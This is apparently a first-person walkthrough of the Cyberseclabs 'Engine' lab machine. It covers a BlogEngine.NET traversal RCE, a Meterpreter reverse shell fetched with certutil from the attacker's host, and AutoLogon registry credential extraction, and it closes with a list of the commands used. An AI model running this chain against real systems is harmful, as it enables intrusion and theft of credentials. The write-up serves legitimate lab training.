Premise
Note: Due to reasons connected to the lab, the credentials of the Windows system didn’t appear when I reproduced the video.
In this walkthrough, we demonstrated basic enumeration and exploitation of a web server installed on Windows. We then found that the Windows system stores credentials in the AutoLogon registry key, which enabled us to escalate our privileges.
Machine Name: Engine
Difficulty: Medium
Skills Learned
- Web server enumeration and exploitation
- Windows AutoLogon registry credential extraction
In this video, I’m going to walk you through how I tackled the “Engine” machine from Cyberseclabs. It was a fun challenge that involved finding a vulnerability in a web application, getting a reverse shell, and then trying to escalate my privileges to get full control of the machine.
Finding a Way In
My first step was to scan the machine to see what services were running. I found an HTTP server and an SMB server. I tried to see if I could access any of the SMB shares, but I was denied access, so I moved on to the web server.
When I accessed the web server, I was greeted with the default IIS page. I didn’t see any obvious directories, so I used a directory brute-forcing tool to look for hidden ones. It found a /blog directory, which led me to a BlogEngine.NET application. I knew that this was a good place to start looking for vulnerabilities.
Exploiting the Blog
I used searchsploit to look for exploits for BlogEngine.NET and found one for a “Directory Traversal Remote Code Execution” vulnerability. An authenticated user can upload a malicious .ascx user control through the blog, and a path-traversal flaw in how the application resolves theme files lets the attacker make it load and execute that uploaded control instead of the theme’s own PostView.ascx.
I downloaded the exploit, which was an .ascx file, and edited it to include my IP address and the port for the reverse shell. I then logged into the blog application using the default credentials “admin:admin” and uploaded the exploit file.
After some trial and error, I worked out that the exploit file had to be renamed to postview.ascx for it to work: the application looks for a control of that exact name, so the traversal only pays off if the uploaded file carries it. Once I had renamed it, I triggered the vulnerability by navigating to a specific URL, which gave me a reverse shell on the machine!
Getting a Better Shell
The initial shell I got was unstable, so I decided to create a more capable one using Metasploit. I generated a Meterpreter payload, a type of shell that gives you extensive control over the target machine, and downloaded it to the target using certutil.
I then set up a listener on my machine to catch the Meterpreter session. After some troubleshooting, I executed the payload and got a stable Meterpreter session. I then used the sysinfo command to confirm that the target machine was running Windows Server 2012 R2.
Trying to Escalate Privileges
My next goal was to escalate my privileges to administrator. A common way to do this on Windows is to look for credentials stored in the registry: when automatic logon is configured through the registry, the Winlogon key holds the account name and password in clear text, and that key is readable by any local user, so a low-privileged shell is enough to read it. I used a Metasploit module to search for AutoLogon credentials.
The module successfully found the administrator’s username and password! I then tried to use these credentials to log in using a tool called evil-winrm, but I kept getting an authorization error. I’m not sure why this was happening, as the credentials had worked for me before. It’s possible that there was an issue with the lab environment at the time.
Even though I wasn’t able to log in as the administrator, I was still able to demonstrate the process of finding and exploiting a vulnerability, getting a reverse shell, and then finding the credentials to escalate my privileges.
Commands I Used
Here are some of the key commands I used during this process:
- Scanning for services:
nmap
- Listing SMB shares:
smbclient -L //172.31.1.16
- Searching for exploits:
searchsploit blogengine
- Setting up a netcat listener:
nc -lvp 4445
- Generating a Meterpreter payload:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.16 LPORT=4546 -f exe -o blog.exe
- Starting a Python web server:
python3 -m http.server
- Downloading a file to the target machine:
certutil.exe -urlcache -f http://10.10.0.16:8000/blog.exe blog.exe
- Starting the Metasploit console:
msfconsole
- Using the multi-handler exploit:
use exploit/multi/handler
- Setting the payload:
set payload windows/meterpreter/reverse_tcp
- Getting system information:
sysinfo
- Searching for AutoLogon credentials:
search autologon
- Using the windows_autologon module:
use post/windows/gather/credentials/windows_autologon
- Logging in with evil-winrm:
evil-winrm -i 172.31.1.16 -u administrator -p <password>
- Querying the registry:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"